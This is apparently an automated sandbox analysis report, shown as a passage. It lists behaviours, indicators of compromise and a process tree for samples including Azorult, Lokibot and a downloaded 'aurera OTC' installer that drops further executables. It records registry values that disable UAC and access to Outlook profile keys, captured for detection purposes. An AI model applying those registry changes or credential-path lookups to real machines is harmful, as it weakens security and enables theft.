chrome.exepid process 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
rfusclient.exepid process 3980 rfusclient.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
chrome.exedescription pid process Token: SeShutdownPrivilege 2736 chrome.exe Token: SeCreatePagefilePrivilege 2736 chrome.exe Token: SeShutdownPrivilege 2736 chrome.exe Token: SeCreatePagefilePrivilege 2736 chrome.exe Token: SeShutdownPrivilege 2736 chrome.exe Token: SeCreatePagefilePrivilege 2736 chrome.exe Token: SeShutdownPrivilege 2736 chrome.exe Token: SeCreatePagefilePrivilege 2736 chrome.exe Token: SeShutdownPrivilege 2736 chrome.exe Token: SeCreatePagefilePrivilege 2736 chrome.exe Token: SeShutdownPrivilege 2736 chrome.exe Token: SeCreatePagefilePrivilege 2736 chrome.exe Token: SeShutdownPrivilege 2736 chrome.exe Token: SeCreatePagefilePrivilege 2736 chrome.exe Token: SeShutdownPrivilege 2736 chrome.exe Token: SeCreatePagefilePrivilege 2736 chrome.exe Token: SeShutdownPrivilege 2736 chrome.exe Token: SeCreatePagefilePrivilege 2736 chrome.exe Token: SeShutdownPrivilege 2736 chrome.exe Token: SeCreatePagefilePrivilege 2736 chrome.exe Token: SeShutdownPrivilege 2736 chrome.exe Token: SeCreatePagefilePrivilege 2736 chrome.exe Token: SeShutdownPrivilege 2736 chrome.exe Token: SeCreatePagefilePrivilege 2736 chrome.exe Token: SeShutdownPrivilege 2736 chrome.exe Token: SeCreatePagefilePrivilege 2736 chrome.exe Token: SeShutdownPrivilege 2736 chrome.exe Token: SeCreatePagefilePrivilege 2736 chrome.exe Token: SeShutdownPrivilege 2736 chrome.exe Token: SeCreatePagefilePrivilege 2736 chrome.exe Token: SeShutdownPrivilege 2736 chrome.exe Token: SeCreatePagefilePrivilege 2736 chrome.exe Token: SeShutdownPrivilege 2736 chrome.exe Token: SeCreatePagefilePrivilege 2736 chrome.exe Token: SeShutdownPrivilege 2736 chrome.exe Token: SeCreatePagefilePrivilege 2736 chrome.exe Token: SeShutdownPrivilege 2736 chrome.exe Token: SeCreatePagefilePrivilege 2736 chrome.exe Token: SeShutdownPrivilege 2736 chrome.exe Token: SeCreatePagefilePrivilege 2736 chrome.exe Token: SeShutdownPrivilege 2736 chrome.exe Token: SeCreatePagefilePrivilege 2736 chrome.exe Token: SeShutdownPrivilege 2736 chrome.exe Token: SeCreatePagefilePrivilege 2736 chrome.exe Token: SeShutdownPrivilege 2736 chrome.exe Token: SeCreatePagefilePrivilege 2736 chrome.exe Token: SeShutdownPrivilege 2736 chrome.exe Token: SeCreatePagefilePrivilege 2736 chrome.exe Token: SeShutdownPrivilege 2736 chrome.exe Token: SeCreatePagefilePrivilege 2736 chrome.exe Token: SeShutdownPrivilege 2736 chrome.exe Token: SeCreatePagefilePrivilege 2736 chrome.exe Token: SeShutdownPrivilege 2736 chrome.exe Token: SeCreatePagefilePrivilege 2736 chrome.exe Token: SeShutdownPrivilege 2736 chrome.exe Token: SeCreatePagefilePrivilege 2736 chrome.exe Token: SeShutdownPrivilege 2736 chrome.exe Token: SeCreatePagefilePrivilege 2736 chrome.exe Token: SeShutdownPrivilege 2736 chrome.exe Token: SeCreatePagefilePrivilege 2736 chrome.exe Token: SeShutdownPrivilege 2736 chrome.exe Token: SeCreatePagefilePrivilege 2736 chrome.exe Token: SeShutdownPrivilege 2736 chrome.exe Token: SeCreatePagefilePrivilege 2736 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
chrome.exeaurera+OTC+install.tmppid process 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 1768 aurera+OTC+install.tmp 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
chrome.exefirefox.exefirefox.exepid process 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 1392 firefox.exe 1392 firefox.exe 1392 firefox.exe 1392 firefox.exe 1392 firefox.exe 1392 firefox.exe 1392 firefox.exe 1392 firefox.exe 1392 firefox.exe 1392 firefox.exe 1392 firefox.exe 1392 firefox.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 2736 chrome.exe 4688 firefox.exe 4688 firefox.exe 4688 firefox.exe 4688 firefox.exe 4688 firefox.exe 4688 firefox.exe 4688 firefox.exe 4688 firefox.exe 4688 firefox.exe 4688 firefox.exe 4688 firefox.exe 4688 firefox.exe -
Suspicious use of SetWindowsHookEx 64 IoCs
Processes:
WINWORD.EXEaurera_dx.exeaurera_dx-1716192337.exefirefox.exefirefox.exeOpenWith.exeOpenWith.exepid process 1804 WINWORD.EXE 1804 WINWORD.EXE 1804 WINWORD.EXE 1804 WINWORD.EXE 1804 WINWORD.EXE 1804 WINWORD.EXE 1804 WINWORD.EXE 1804 WINWORD.EXE 2812 aurera_dx.exe 4380 aurera_dx-1716192337.exe 1392 firefox.exe 1392 firefox.exe 1392 firefox.exe 1392 firefox.exe 1392 firefox.exe 1392 firefox.exe 1392 firefox.exe 1392 firefox.exe 1392 firefox.exe 1392 firefox.exe 1392 firefox.exe 1392 firefox.exe 1392 firefox.exe 4688 firefox.exe 4132 OpenWith.exe 5428 OpenWith.exe 5428 OpenWith.exe 5428 OpenWith.exe 5428 OpenWith.exe 5428 OpenWith.exe 5428 OpenWith.exe 5428 OpenWith.exe 5428 OpenWith.exe 5428 OpenWith.exe 5428 OpenWith.exe 5428 OpenWith.exe 5428 OpenWith.exe 5428 OpenWith.exe 5428 OpenWith.exe 5428 OpenWith.exe 5428 OpenWith.exe 5428 OpenWith.exe 5428 OpenWith.exe 5428 OpenWith.exe 5428 OpenWith.exe 5428 OpenWith.exe 5428 OpenWith.exe 5428 OpenWith.exe 5428 OpenWith.exe 5428 OpenWith.exe 5428 OpenWith.exe 5428 OpenWith.exe 5428 OpenWith.exe 5428 OpenWith.exe 5428 OpenWith.exe 5428 OpenWith.exe 5428 OpenWith.exe 5428 OpenWith.exe 5428 OpenWith.exe 5428 OpenWith.exe 5428 OpenWith.exe 5428 OpenWith.exe 5428 OpenWith.exe 5428 OpenWith.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
chrome.exedescription pid process target process PID 2736 wrote to memory of 4576 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 4576 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 1236 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 1236 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 1236 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 1236 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 1236 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 1236 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 1236 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 1236 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 1236 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 1236 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 1236 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 1236 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 1236 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 1236 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 1236 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 1236 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 1236 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 1236 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 1236 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 1236 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 1236 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 1236 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 1236 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 1236 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 1236 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 1236 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 1236 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 1236 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 1236 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 1236 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 1236 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 4388 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 4388 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3636 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3636 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3636 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3636 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3636 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3636 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3636 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3636 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3636 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3636 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3636 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3636 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3636 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3636 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3636 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3636 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3636 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3636 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3636 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3636 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3636 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3636 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3636 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3636 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3636 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3636 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3636 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3636 2736 chrome.exe chrome.exe PID 2736 wrote to memory of 3636 2736 chrome.exe chrome.exe -
System policy modification 1 TTPs 3 IoCs
Processes:
Azorult.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Azorult.exe -
Views/modifies file attributes 1 TTPs 6 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid process 4588 attrib.exe 6856 attrib.exe 6872 attrib.exe 6888 attrib.exe 1820 attrib.exe 4884 attrib.exe -
outlook_office_path 1 IoCs
Processes:
Lokibot.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook Lokibot.exe -
outlook_win_path 1 IoCs
Processes:
Lokibot.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Lokibot.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Boendet.docx" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1804
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb07a2ab58,0x7ffb07a2ab68,0x7ffb07a2ab782⤵PID:4576
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1700 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:22⤵PID:1236
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1892 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:4388
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2244 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:3636
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3076 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:12⤵PID:4108
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3128 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:12⤵PID:2040
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4336 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:12⤵PID:3704
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4484 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:1180
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4380 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:556
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4696 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:1864
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4840 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:2600
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5000 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:2720
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4908 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:12⤵PID:228
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5044 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:12⤵PID:2856
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4960 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:12⤵PID:2528
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5092 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:12⤵PID:660
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5008 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:12⤵PID:2340
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=5052 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:12⤵PID:5032
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3164 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:1860
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=3152 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:12⤵PID:2764
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=2828 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:12⤵PID:1120
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1712 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:3628
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4388 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:2108
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5000 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:4092
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5680 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:5016
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5708 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:1736
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5720 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:2764
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5720 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:2340
-
C:\Users\Admin\Downloads\aurera+OTC+install.exe"C:\Users\Admin\Downloads\aurera+OTC+install.exe"2⤵
- Executes dropped EXE
PID:2660 -
C:\Users\Admin\AppData\Local\Temp\is-J00RV.tmp\aurera+OTC+install.tmp"C:\Users\Admin\AppData\Local\Temp\is-J00RV.tmp\aurera+OTC+install.tmp" /SL5="$11003A,124196076,832512,C:\Users\Admin\Downloads\aurera+OTC+install.exe"3⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:1768 -
C:\Users\Admin\AppData\Local\Programs\Aurera Global OT\aurera_dx.exe"C:\Users\Admin\AppData\Local\Programs\Aurera Global OT\aurera_dx.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:2812 -
C:\Users\Admin\AppData\Local\Programs\Aurera Global OT\aurera_dx.exeaurera_dx.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:648 -
C:\Users\Admin\AppData\Roaming\OTClientV8\Aurera\aurera_dx-1716192337.exeC:\Users\Admin\AppData\Roaming\OTClientV8\Aurera\aurera_dx-1716192337.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:4380 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1652 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:4092 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=1112 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:12⤵PID:1716
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=5512 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:12⤵PID:468
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3316 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:4884
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5584 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:3144
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5172 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:1484
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5248 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:1864
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4372 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:82⤵PID:3404
-
